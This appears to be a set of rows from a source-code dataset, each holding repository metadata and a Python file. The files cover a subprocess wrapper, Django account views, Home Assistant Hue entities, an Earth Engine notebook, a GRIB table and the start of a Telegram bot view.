| 2020-04-03T19:58:23
| 251,388,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 334
|
py
|
print("How old are you:")
age = int(input())
responsible = input("Are you responsible:? T/N")
if (age > 100):
print("You're definetly an adult")
elif (age > 18) and responsible == "T":
print("You're a responsible adult")
elif responsible != "T":
print("You're unresponsible adult")
else:
print("You're not an adult")
|
[
"adagioo1993@gmail.com"
] |
adagioo1993@gmail.com
|
da5e1b27e409b9adf9e9630f26cb45c2013b63ba
|
82b997b4e2f7986b3619f49c45410839955f699d
|
/invoke/monkey.py
|
073762f60b33866b49d1073f41c50571aa26fd75
|
[
"BSD-2-Clause"
] |
permissive
|
markatto/invoke
|
a5c81f97fba810270b3a87aeafd1a6689544d340
|
3f2df01d989a325a70826226562ee19ce69e3ac1
|
refs/heads/master
| 2021-01-18T07:14:41.386860
| 2012-07-27T19:58:41
| 2012-07-27T19:58:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,799
|
py
|
# Fuckin' A.
import select, errno, os, sys
from subprocess import Popen as OriginalPopen, mswindows
class Popen(OriginalPopen):
#
# Custom code
#
def __init__(self, *args, **kwargs):
hide = kwargs.pop('hide', [])
super(Popen, self).__init__(*args, **kwargs)
self.hide = hide
def handle(self, stream, data):
stream_name = 'out' if stream is sys.stdout else 'err'
if stream_name not in self.hide:
stream.write(data)
stream.flush()
#
# Copy/modified code from upstream
#
if mswindows:
def _readerthread(self, fh, buffer):
# TODO: How to determine which sys.std(out|err) to use?
buffer.append(fh.read())
else: # Sane operating systems
def _communicate(self, input):
read_set = []
write_set = []
stdout = None # Return
stderr = None # Return
if self.stdin:
# Flush stdio buffer. This might block, if the user has
# been writing to .stdin in an uncontrolled fashion.
self.stdin.flush()
if input:
write_set.append(self.stdin)
else:
self.stdin.close()
if self.stdout:
read_set.append(self.stdout)
stdout = []
if self.stderr:
read_set.append(self.stderr)
stderr = []
input_offset = 0
while read_set or write_set:
try:
rlist, wlist, xlist = select.select(read_set, write_set, [])
except select.error, e:
if e.args[0] == errno.EINTR:
continue
raise
if self.stdin in wlist:
# When select has indicated that the file is writable,
# we can write up to PIPE_BUF bytes without risk
# blocking. POSIX defines PIPE_BUF >= 512
chunk = input[input_offset : input_offset + 512]
bytes_written = os.write(self.stdin.fileno(), chunk)
input_offset += bytes_written
if input_offset >= len(input):
self.stdin.close()
write_set.remove(self.stdin)
if self.stdout in rlist:
data = os.read(self.stdout.fileno(), 1)
if data == "":
self.stdout.close()
read_set.remove(self.stdout)
self.handle(sys.stdout, data)
stdout.append(data)
if self.stderr in rlist:
data = os.read(self.stderr.fileno(), 1)
if data == "":
self.stderr.close()
read_set.remove(self.stderr)
self.handle(sys.stderr, data)
stderr.append(data)
# All data exchanged. Translate lists into strings.
if stdout is not None:
stdout = ''.join(stdout)
if stderr is not None:
stderr = ''.join(stderr)
# Translate newlines, if requested. We cannot let the file
# object do the translation: It is based on stdio, which is
# impossible to combine with select (unless forcing no
# buffering).
if self.universal_newlines and hasattr(file, 'newlines'):
if stdout:
stdout = self._translate_newlines(stdout)
if stderr:
stderr = self._translate_newlines(stderr)
self.wait()
return (stdout, stderr)
|
[
"jeff@bitprophet.org"
] |
jeff@bitprophet.org
|
2c4fb23f9c4fdbb529dd4ae121804e83ea1b1c3f
|
95673dabd649d4e358921182572e26c3ea21b53a
|
/PhysicsAnalysis/JetTagging/JetTagAlgs/BTagging/share/.svn/text-base/BTagging_LifetimeTag1D.py.svn-base
|
ae543dd574131fdbd0959767505ca75b6aa67f7b
|
[] |
no_license
|
zqhsfz/DoubleBTaggingDF
|
141deac5f2eca8763dd25c9d10e8458efcd6dd75
|
80c7c374ea8917c540b7fbfacb84e9e158787269
|
refs/heads/master
| 2020-05-31T07:47:47.525578
| 2015-09-15T20:25:31
| 2015-09-15T20:25:31
| 40,974,366
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,749
|
if BTaggingFlags.Runmodus == 'analysis':
lhVariablesForAnalysis = [ "significance1D" ]
# each tagger needs own instance, can't be shared!
from JetTagTools.JetTagToolsConf import Analysis__LikelihoodTool
myBTagLikelihoodTool1D = Analysis__LikelihoodTool(
name = "myBTagLikelihoodTool1D",
allLhVariables = lhVariablesForAnalysis,
useTheseLhVariables = lhVariablesForAnalysis,
OutputLevel = BTaggingFlags.OutputLevel
)
ToolSvc += myBTagLikelihoodTool1D
if BTaggingFlags.OutputLevel < 3:
print myBTagLikelihoodTool1D
from JetTagTools.JetTagToolsConf import Analysis__LifetimeTag
Z0LifetimeTagTool = Analysis__LifetimeTag(
name = "LifetimeTag1D",
Runmodus = BTaggingFlags.Runmodus,
LifetimeModus = "1D",
OutputLevel = BTaggingFlags.OutputLevel,
TrackToVertexTool = BTagTrackToVertexTool,
LikelihoodTool = myBTagLikelihoodTool1D,
useVariables = lhVariablesForAnalysis
)
# make sure to create all histos when in ref mode (for now there is only one variable in this tagger ...)
if BTaggingFlags.Runmodus == 'reference':
Z0LifetimeTagTool.useVariables = [ "significance1D" ]
ToolSvc += Z0LifetimeTagTool
if BTaggingFlags.OutputLevel < 3:
print Z0LifetimeTagTool
|
[
"zqhsfz@gmail.com"
] |
zqhsfz@gmail.com
|
|
7e94d265c08c9712028dcbc9b5fd76e240275ddf
|
ea3bf64156bbb79544bfd6b42bbcd3eda453ac31
|
/content/Example Based Unit Testing/code-snippets-6/fake_logger.py
|
362f21c1f7b3dad97bc0e4fff2985f291ce72004
|
[
"CC-BY-4.0"
] |
permissive
|
Jackiexiong/software-testing-course
|
563ffc8543fdcff9500f64944fd76e7c0c8e1144
|
3803851dcf9f7bbd0f0b89fca6c9c5e3a48f22e0
|
refs/heads/master
| 2021-07-08T02:10:25.915964
| 2017-10-04T20:50:51
| 2017-10-04T20:50:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
from logger_interface import LoggerInterface
# A logger that prints the message to the console
class FakeLogger(LoggerInterface):
def log(self, msg):
print("Log: {0}".format(msg))
return True
|
[
"rvprasad@ksu.edu"
] |
rvprasad@ksu.edu
|
55d76aefd85c06e28422f30adca73fdf7d8a4245
|
bdc14c302b60114321466cf38f1bf03a75a01eb3
|
/ImageCollection/overview.py
|
8e70ddb38b66a61677a64f3e1860366c6f7b755b
|
[
"MIT"
] |
permissive
|
nishadhka/earthengine-py-notebooks
|
a09392fc83202884c8b36c76263a9e16f7351d40
|
fe3edf5189a424ffbedb42d1bc5ed95ff0af3bdb
|
refs/heads/master
| 2020-12-21T12:38:54.756294
| 2020-01-27T01:48:55
| 2020-01-27T01:48:55
| 236,433,700
| 1
| 0
|
MIT
| 2020-01-27T06:42:20
| 2020-01-27T06:42:19
| null |
UTF-8
|
Python
| false
| false
| 3,776
|
py
|
'''
<table class="ee-notebook-buttons" align="left">
<td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/ImageCollection/overview.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td>
<td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/ImageCollection/overview.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td>
<td><a target="_blank" href="https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=ImageCollection/overview.ipynb"><img width=58px src="https://mybinder.org/static/images/logo_social.png" />Run in binder</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/ImageCollection/overview.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td>
</table>
'''
# %%
'''
## Install Earth Engine API
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.
The magic command `%%capture` can be used to hide output from a specific cell.
'''
# %%
# %%capture
# !pip install earthengine-api
# !pip install geehydro
# %%
'''
Import libraries
'''
# %%
import ee
import folium
import geehydro
# %%
'''
Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once. Uncomment the line `ee.Authenticate()`
if you are running this notebook for this first time or if you are getting an authentication error.
'''
# %%
# ee.Authenticate()
ee.Initialize()
# %%
'''
## Create an interactive map
This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function.
The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.
'''
# %%
Map = folium.Map(location=[40, -100], zoom_start=4)
Map.setOptions('HYBRID')
# %%
'''
## Add Earth Engine Python script
'''
# %%
# Create arbitrary constant images.
constant1 = ee.Image(1)
constant2 = ee.Image(2)
# Create a collection by giving a list to the constructor.
collectionFromConstructor = ee.ImageCollection([constant1, constant2])
print('collectionFromConstructor: ', collectionFromConstructor.getInfo())
# Create a collection with fromImages().
collectionFromImages = ee.ImageCollection.fromImages(
[ee.Image(3), ee.Image(4)])
print('collectionFromImages: ', collectionFromImages.getInfo())
# Merge two collections.
mergedCollection = collectionFromConstructor.merge(collectionFromImages)
print('mergedCollection: ', mergedCollection.getInfo())
# # Create a toy FeatureCollection
# features = ee.FeatureCollection(
# [ee.Feature({}, {'foo': 1}), ee.Feature({}, {'foo': 2})])
# # Create an ImageCollection from the FeatureCollection
# # by mapping a function over the FeatureCollection.
# images = features.map(function(feature) {
# return ee.Image(ee.Number(feature.get('foo')))
# })
# # Print the resultant collection.
# print('Image collection: ', images)
# %%
'''
## Display Earth Engine data layers
'''
# %%
Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)
Map
|
[
"giswqs@gmail.com"
] |
giswqs@gmail.com
|
9913227f3817aedd27bdd11f4702d2fbab8d619d
|
36f7e329efaf9f3b37003ef5c769628865f472ec
|
/Swasthya/accounts/views.py
|
ea76f5f4c924b52dfa9e2173a08fa78c0599be15
|
[] |
no_license
|
aolashram/kri-vibe
|
d40080679f7f37568a8b57c2f7009ce6f6bcbbbc
|
6d77600c0c6953c3c78ec9a1fdf5a80c6611e162
|
refs/heads/main
| 2023-05-31T17:50:09.377629
| 2021-06-21T04:38:51
| 2021-06-21T04:38:51
| 378,806,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,540
|
py
|
from django.shortcuts import render,redirect,get_object_or_404
from django.http import HttpResponse,HttpResponseRedirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth import update_session_auth_hash
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.forms import PasswordChangeForm,AuthenticationForm,UserCreationForm
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from django.urls import reverse
from django.contrib import messages
from django.contrib.auth.models import User
from django.urls import reverse_lazy
from django.views.generic import CreateView, View
from django.contrib.auth.decorators import login_required
from Employee.models import Employee
#from employee.models import *
from .forms import UserLogin,SignUpForm
# Sign Up View
class SignUpView(CreateView):
form_class = SignUpForm
success_url = reverse_lazy('accounts:signup')
template_name = 'commons/signup.html'
class LoginView(View):
def get(self, request):
return render(request, 'commons/login.html', { 'form': AuthenticationForm })
# really low level
def post(self, request):
form = AuthenticationForm(request, data=request.POST)
print(request.POST)
if form.is_valid():
#print('inside post, is valid')
user = authenticate(
request,
username=form.cleaned_data.get('username'),
password=form.cleaned_data.get('password')
)
#print(user)
if user is None:
return render(
request,
'commons/login.html',
{ 'form': form, 'invalid_creds': True }
)
try:
form.confirm_login_allowed(user)
except ValidationError:
return render(
request,
'commons/login.html',
{ 'form': form, 'invalid_creds': True }
)
login(request, user)
try:
employee = Employee.objects.get(user=user)
except ObjectDoesNotExist:
employee = None
return redirect(reverse('console:dashboard'))
class ProfileView(LoginRequiredMixin, View):
def get(self, request):
surveys = Survey.objects.filter(created_by=request.user).all()
assigned_surveys = SurveyAssignment.objects.filter(assigned_to=request.user).all()
context = {
'surveys': surveys,
'assigned_surveys': assigned_surveys
}
return render(request, 'console/dashboard.html', context)
class LogoutView(View):
def get(self, request):
logout(request)
return HttpResponseRedirect(settings.LOGIN_URL)
@login_required(login_url='/login/')
def home(request):
return render(request, 'console/dashboard.html')
def changepassword(request):
if not request.user.is_authenticated:
return redirect('/')
'''
Please work on me -> success & error messages & style templates
'''
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save(commit=True)
update_session_auth_hash(request,user)
messages.success(request,'Password changed successfully',extra_tags = 'alert alert-success alert-dismissible show' )
return redirect('accounts:changepassword')
else:
messages.error(request,'Error,changing password',extra_tags = 'alert alert-warning alert-dismissible show' )
return redirect('accounts:changepassword')
form = PasswordChangeForm(request.user)
return render(request,'accounts/change_password_form.html',{'form':form})
def register_user_view(request):
# WORK ON (MESSAGES AND UI) & extend with email field
if request.method == 'POST':
form = UserAddForm(data = request.POST)
if form.is_valid():
instance = form.save(commit = False)
instance.save()
username = form.cleaned_data.get("username")
messages.success(request,'Account created for {0} !!!'.format(username),extra_tags = 'alert alert-success alert-dismissible show' )
return redirect('accounts:register')
else:
messages.error(request,'Username or password is invalid',extra_tags = 'alert alert-warning alert-dismissible show')
return redirect('accounts:register')
form = UserAddForm()
dataset = dict()
dataset['form'] = form
dataset['title'] = 'register users'
return render(request,'accounts/register.html',dataset)
def login_view(request):
'''
work on me - needs messages and redirects
'''
login_user = request.user
if request.method == 'POST':
form = UserLogin(data = request.POST)
if form.is_valid():
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(request, username = username, password = password)
if user and user.is_active:
login(request,user)
if login_user.is_authenticated:
return redirect('dashboard:dashboard')
else:
messages.error(request,'Account is invalid',extra_tags = 'alert alert-error alert-dismissible show' )
return redirect('accounts:login')
else:
return HttpResponse('data not valid')
dataset=dict()
form = UserLogin()
dataset['form'] = form
return render(request,'accounts/login.html',dataset)
def user_profile_view(request):
'''
user profile view -> staffs (No edit) only admin/HR can edit.
'''
user = request.user
if user.is_authenticated:
employee = Employee.objects.filter(user = user).first()
emergency = Emergency.objects.filter(employee = employee).first()
relationship = Relationship.objects.filter(employee = employee).first()
bank = Bank.objects.filter(employee = employee).first()
dataset = dict()
dataset['employee'] = employee
dataset['emergency'] = emergency
dataset['family'] = relationship
dataset['bank'] = bank
return render(request,'dashboard/employee_detail.html',dataset)
return HttpResponse("Sorry , not authenticated for this,admin or whoever you are :)")
def logout_view(request):
logout(request)
return redirect('accounts:login')
def users_list(request):
employees = Employee.objects.all()
return render(request,'accounts/users_table.html',{'employees':employees,'title':'Users List'})
def users_unblock(request,id):
user = get_object_or_404(User,id = id)
emp = Employee.objects.filter(user = user).first()
emp.is_blocked = False
emp.save()
user.is_active = True
user.save()
return redirect('accounts:users')
def users_block(request,id):
user = get_object_or_404(User,id = id)
emp = Employee.objects.filter(user = user).first()
emp.is_blocked = True
emp.save()
user.is_active = False
user.save()
return redirect('accounts:users')
def users_blocked_list(request):
blocked_employees = Employee.objects.all_blocked_employees()
return render(request,'accounts/all_deleted_users.html',{'employees':blocked_employees,'title':'blocked users list'})
|
[
"amalrajrs@gmail.com"
] |
amalrajrs@gmail.com
|
d0be734cfa888c010914e448f0d2dd63394549a3
|
371f94ee0f44feeaf68d740f24bd9bb27f83c8aa
|
/app/models.py
|
410942c28fac8f1f24b4850a6988948f8b172033
|
[] |
no_license
|
cjredmond/final_proto
|
f69d62da97428af3d52020054e9a327abbff8d15
|
28d73c7f25a7e8fae07d78b12964cdefeb3103de
|
refs/heads/master
| 2020-09-12T04:57:59.279571
| 2016-11-11T22:44:47
| 2016-11-11T22:44:47
| 73,517,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,218
|
py
|
from django.db import models
from django.dispatch import receiver
from django.db.models.signals import post_save
class League(models.Model):
name = models.CharField(max_length=40)
limit = models.IntegerField()
players = models.ManyToManyField('auth.User')
live = models.BooleanField(default=False)
def __str__(self):
return str(self.id)
@property
def get_squads(self):
return self.squad_set.all()
def get_active_teams(self):
return self.team_set.all()
@receiver(post_save, sender=League)
def create(**kwargs):
created = kwargs['created']
instance = kwargs['instance']
teams = Team.objects.filter(league=None)
for team in teams:
Team.objects.create(city=team.city, name=team.name, league=instance, sport=team.sport, pts_last=team.pts_last, pts_proj=team.pts_proj)
class Squad(models.Model):
user = models.OneToOneField('auth.User')
name = models.CharField(max_length=40)
league = models.ForeignKey(League)
def __str__(self):
return self.name
@property
def total_proj(self):
teams = self.team_set.all()
score = 0
for team in teams:
score = score + team.pts_proj
return score
def checker(self, sport):
teams = self.team_set.all()
count = 0
for team in teams:
if team.sport == sport:
count += 1
if count > 2:
return False
return True
SPORTS = [('f', 'football'), ('b', 'baseball'), ('k', 'basketball')]
class Team(models.Model):
city = models.CharField(max_length=50)
name = models.CharField(max_length=50)
squad = models.ForeignKey(Squad,null=True,blank=True)
league = models.ForeignKey(League,null=True,blank=True)
logo = models.FileField(null=True,blank=True)
sport = models.CharField(max_length=1,choices=SPORTS)
pts_last = models.IntegerField()
pts_proj = models.IntegerField()
#base = models.BooleanField(default=False)
def __str__(self):
return self.name
class Schedule(models.Model):
league = models.OneToOneField(League)
@property
def amount(self):
return self.league.get_squads.count()
|
[
"connor.redmond@gmail.com"
] |
connor.redmond@gmail.com
|
1e01c1ba08ee6205b00c1018a1d84b557ec98285
|
1975ecfc048594b1c05913a3c415bf2c233b37d2
|
/playlist_explanation/src/features/common/month.py
|
3b238d330ac9041a38d72abe7295ba15b4f2f136
|
[] |
no_license
|
GiovanniGabbolini/dave
|
2ad35bbd0abf5aefd1c01436690d647f4b39d82c
|
e0ad90a5fd5691a8cd5e9b24261fb4d3d82ea91e
|
refs/heads/master
| 2023-03-17T06:04:15.127171
| 2021-03-18T19:31:43
| 2021-03-18T19:31:43
| 349,158,307
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 160
|
py
|
from src.utils.decorator_annotations import annotations
@annotations({'entailed': True})
def month(date) -> 'month':
return {'value': date['value'].month}
|
[
"giovanni.gabbolini@gmail.com"
] |
giovanni.gabbolini@gmail.com
|
db154f56ea89f913c7ca67af270e96ea17cc6786
|
00e044ab93ae740e29c48a01db0f9671c740ae55
|
/setup.py
|
417b699ace6fb8a27c7d96a90eb5d1b0e378ef12
|
[
"BSD-3-Clause"
] |
permissive
|
kalessin/crawlera-sessions
|
982f73d69bb7f8e6c0b98b39f08d165200d3eb27
|
52f6eeb28c776d013c4dc46559eb4cede57b893e
|
refs/heads/master
| 2023-04-28T12:35:10.088112
| 2023-03-17T20:12:38
| 2023-03-17T20:12:38
| 157,715,690
| 0
| 0
|
BSD-3-Clause
| 2021-11-22T14:03:24
| 2018-11-15T13:26:12
|
Python
|
UTF-8
|
Python
| false
| false
| 883
|
py
|
# Automatically created by: shub deploy
from setuptools import setup, find_packages
setup(
name = 'crawlera-session',
version = '1.2.8',
description = 'Class that provides decorators and functions for easy handling of crawlera sessions in a scrapy spider.',
long_description = open('README.md').read(),
long_description_content_type = 'text/markdown',
license = 'BSD',
author = 'Martin Olveyra',
author_email = 'molveyra@gmail.com',
url = 'https://github.com/kalessin/crawlera-sessions',
packages = find_packages(),
scripts = [],
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
]
)
|
[
"molveyra@gmail.com"
] |
molveyra@gmail.com
|
5ac318576d07212bbea01d60ecc2ffa701080d72
|
870639af1487cf59b548f56c9cd1a45928c1e2c2
|
/homeassistant/components/hue/v2/entity.py
|
9bb81c16fa544659af4f2bbfefd017b9b381aa70
|
[
"Apache-2.0"
] |
permissive
|
atmurray/home-assistant
|
9f050944d26c084f8f21e8612a7b90c0ae909763
|
133cb2c3b0e782f063c8a30de4ff55a5c14b9b03
|
refs/heads/dev
| 2023-03-19T04:26:40.743852
| 2021-11-27T05:58:25
| 2021-11-27T05:58:25
| 234,724,430
| 2
| 0
|
Apache-2.0
| 2023-02-22T06:18:36
| 2020-01-18T11:27:02
|
Python
|
UTF-8
|
Python
| false
| false
| 4,310
|
py
|
"""Generic Hue Entity Model."""
from __future__ import annotations
from aiohue.v2.controllers.base import BaseResourcesController
from aiohue.v2.controllers.events import EventType
from aiohue.v2.models.clip import CLIPResource
from aiohue.v2.models.connectivity import ConnectivityServiceStatus
from aiohue.v2.models.resource import ResourceTypes
from homeassistant.core import callback
from homeassistant.helpers.entity import DeviceInfo, Entity
from homeassistant.helpers.entity_registry import async_get as async_get_entity_registry
from ..bridge import HueBridge
from ..const import DOMAIN
RESOURCE_TYPE_NAMES = {
# a simple mapping of hue resource type to Hass name
ResourceTypes.LIGHT_LEVEL: "Illuminance",
ResourceTypes.DEVICE_POWER: "Battery",
}
class HueBaseEntity(Entity):
"""Generic Entity Class for a Hue resource."""
_attr_should_poll = False
def __init__(
self,
bridge: HueBridge,
controller: BaseResourcesController,
resource: CLIPResource,
) -> None:
"""Initialize a generic Hue resource entity."""
self.bridge = bridge
self.controller = controller
self.resource = resource
self.device = controller.get_device(resource.id)
self.logger = bridge.logger.getChild(resource.type.value)
# Entity class attributes
self._attr_unique_id = resource.id
# device is precreated in main handler
# this attaches the entity to the precreated device
if self.device is not None:
self._attr_device_info = DeviceInfo(
identifiers={(DOMAIN, self.device.id)},
)
@property
def name(self) -> str:
"""Return name for the entity."""
if self.device is None:
# this is just a guard
# creating a pretty name for device-less entities (e.g. groups/scenes)
# should be handled in the platform instead
return self.resource.type.value
dev_name = self.device.metadata.name
# if resource is a light, use the device name
if self.resource.type == ResourceTypes.LIGHT:
return dev_name
# for sensors etc, use devicename + pretty name of type
type_title = RESOURCE_TYPE_NAMES.get(
self.resource.type, self.resource.type.value.replace("_", " ").title()
)
return f"{dev_name}: {type_title}"
async def async_added_to_hass(self) -> None:
"""Call when entity is added."""
# Add value_changed callbacks.
self.async_on_remove(
self.controller.subscribe(
self._handle_event,
self.resource.id,
(EventType.RESOURCE_UPDATED, EventType.RESOURCE_DELETED),
)
)
@property
def available(self) -> bool:
"""Return entity availability."""
if self.device is None:
# devices without a device attached should be always available
return True
if self.resource.type == ResourceTypes.ZIGBEE_CONNECTIVITY:
# the zigbee connectivity sensor itself should be always available
return True
if zigbee := self.bridge.api.devices.get_zigbee_connectivity(self.device.id):
# all device-attached entities get availability from the zigbee connectivity
return zigbee.status == ConnectivityServiceStatus.CONNECTED
return True
@callback
def on_update(self) -> None:
"""Call on update event."""
# used in subclasses
@callback
def _handle_event(self, event_type: EventType, resource: CLIPResource) -> None:
"""Handle status event for this resource."""
if event_type == EventType.RESOURCE_DELETED and resource.id == self.resource.id:
self.logger.debug("Received delete for %s", self.entity_id)
# non-device bound entities like groups and scenes need to be removed here
# all others will be be removed by device setup in case of device removal
ent_reg = async_get_entity_registry(self.hass)
ent_reg.async_remove(self.entity_id)
else:
self.logger.debug("Received status update for %s", self.entity_id)
self.on_update()
self.async_write_ha_state()
|
[
"noreply@github.com"
] |
atmurray.noreply@github.com
|
f6103c08d17d281520b0332bf0896a292ba689b4
|
7a4649fa35a0306b120c76e448944ff48539c9cc
|
/rerun/11_r_downpayment.py
|
f6953ce828fb427a42f5c0e517e1e209a2ce9edd
|
[] |
no_license
|
sphilmoon/Python3_tutorial_mosh
|
58ec9a1abdf801ccb1d88f85de56baa5f6fb4a7f
|
bb70de5bff7b4d26f58fe1dcdfd4ec4957631bd5
|
refs/heads/main
| 2023-01-24T17:51:56.181367
| 2020-12-06T10:15:00
| 2020-12-06T10:15:00
| 294,370,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 195
|
py
|
house_price = 1E6
good_credit = False
if good_credit:
downpayment = 0.1 * house_price
else:
downpayment = 0.2 * house_price
message = f"My downpayment is: ${downpayment}."
print(message)
|
[
"sphilmoon@gmail.com"
] |
sphilmoon@gmail.com
|
ba471b38a7741ee3be4fb20ad9456b982c45fe2b
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/old_hand/little_way/say_case_in_way/eye/find_little_fact.py
|
9c9ce14fb0ac99641f3675d853aa3df09b8532f5
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 186
|
py
|
#! /usr/bin/env python
def case(str_arg):
use_last_case(str_arg)
print('case')
def use_last_case(str_arg):
print(str_arg)
if __name__ == '__main__':
case('want_man')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
d96ba463d4ea4a6fbedb6545ef6a125cb4bb83c8
|
2ca50eb937c02a108bd80f7ed051065f26814921
|
/fabapp/urls.py
|
0096ccea0b61d94c6c8603bb5be829a41aa42907
|
[] |
no_license
|
pythexcel/fab
|
b868f6e597c61aeb1115e66234f1a2a320a9c3a0
|
ce548c79e82eaacfd0c9d17d3e63cec64788e292
|
refs/heads/master
| 2022-12-15T00:24:10.388924
| 2021-07-26T07:58:10
| 2021-07-26T07:58:10
| 197,142,879
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,327
|
py
|
from rest_framework.urlpatterns import format_suffix_patterns
from django.urls import path as url
from fabapp import views
urlpatterns = [
url('test', views.Test.as_view()),
url('register', views.UserRegister.as_view()),
url('login', views.UserAuth.as_view()),
url('forget_password', views.UserPassword.as_view()),
url('profile', views.Userprofile.as_view()),
url('profile/<uuid:pk>', views.Userprofile.as_view()),
url('listexhbiton',views.ListExhibhition.as_view()),
url('exhibition_create', views.CreateExhibition.as_view()),
url('exhibition_update/<uuid:pk>', views.CreateExhibition.as_view()),
url('exifab/<uuid:pk>/<uuid:pk_user>', views.ExhibitionFab.as_view()),
url('exhibtorlist', views.ExhibitorList.as_view()),
url('fabricatorlist', views.FabricatorList.as_view()),
url('banuser/<uuid:pk>', views.BanUser.as_view()),
url('profile/<uuid:pk>', views.Userprofile.as_view()),
url('addprod', views.Addprod.as_view()),
url('addbrand', views.Addbrand.as_view()),
url('addfunr', views.Addfurni.as_view()),
url('listitem', views.listItem.as_view()),
url('chat/<uuid:pk>/<uuid:pk_exi>', views.ChatMessages.as_view()),
url('partuser', views.ParticularUser.as_view())
]
urlpatterns = format_suffix_patterns(urlpatterns, allowed=['json', 'html'])
|
[
"pythexcel@excellencetechnologies.in"
] |
pythexcel@excellencetechnologies.in
|
6e1074fc950074a4da2234e90afc154a5d59de9e
|
2293c76c3d18e2fcd44ded90bd40113d26285663
|
/pyeccodes/defs/grib2/tables/5/4_11_table.py
|
6d45486fdbeaecd83c9e1e5025d319f1596e84f5
|
[
"Apache-2.0"
] |
permissive
|
ecmwf/pyeccodes
|
b1f121dbddf68d176a03805ed5144ba0b37ac211
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
refs/heads/master
| 2022-04-23T10:37:40.524078
| 2020-04-18T06:30:29
| 2020-04-18T06:30:29
| 255,554,540
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,099
|
py
|
def load(h):
return ({'abbr': 1,
'code': 1,
'title': 'Successive times processed have same forecast time, start time of '
'forecast is incremented'},
{'abbr': 2,
'code': 2,
'title': 'Successive times processed have same start time of forecast, '
'forecast time is incremented'},
{'abbr': 3,
'code': 3,
'title': 'Successive times processed have start time of forecast incremented '
'and forecast time decremented so that valid time remains constant'},
{'abbr': 4,
'code': 4,
'title': 'Successive times processed have start time of forecast decremented '
'and forecast time incremented so that valid time remains constant'},
{'abbr': 5,
'code': 5,
'title': 'Floating subinterval of time between forecast time and end of '
'overall time interval'},
{'abbr': None, 'code': 255, 'title': 'Missing'})
|
[
"baudouin.raoult@ecmwf.int"
] |
baudouin.raoult@ecmwf.int
|
3bad23447252471f37c8a506d6edc76be962f754
|
1bf2465e4e43d5b8bcdb8eed0c3fdcd999c34b3b
|
/telegrambot/views.py
|
7a7e9c2013ddb5a3cf0e66eff3804fd45a471e1b
|
[] |
no_license
|
suhailvs/telegram_bot
|
075874c36fc03189680ad00b1580272efa47e5a1
|
3f44274a699521dc9b6b737051631932060a7357
|
refs/heads/main
| 2023-02-21T20:37:16.931097
| 2021-01-27T01:46:19
| 2021-01-27T02:00:46
| 332,320,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,768
|
py
|
import json
import requests
import random
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from django.http import HttpResponse
from django.views import generic
from django.conf import settings
from .models import TelegramUser, CallCount
# TELEGRAM_USERNAME = "impress_ai_bot"
class TelegramUserList(generic.ListView):
model = TelegramUser
class TelegramBotView(generic.View):
def update_callcount_and_get_text(self, data):
if 'callback_query' not in data.keys():
return ''
callback_query = data['callback_query']
from_user = callback_query.get('from')
telegram_user, _ = TelegramUser.objects.get_or_create(
telegram_id = from_user.get('id'),
defaults={'username':from_user.get('username',''), 'firstname':from_user.get('first_name','')}
)
button = callback_query.get('data')
call_count, _ = CallCount.objects.get_or_create(user=telegram_user, button=button)
call_count.count += 1
call_count.save()
text = callback_query.get('message','')
return {'chat_id':text.get('chat').get('id'), 'text':button}
def send_messages(self, message):
jokes = {
'stupid': ["""Yo' Mama is so stupid, she needs a recipe to make ice cubes.""",
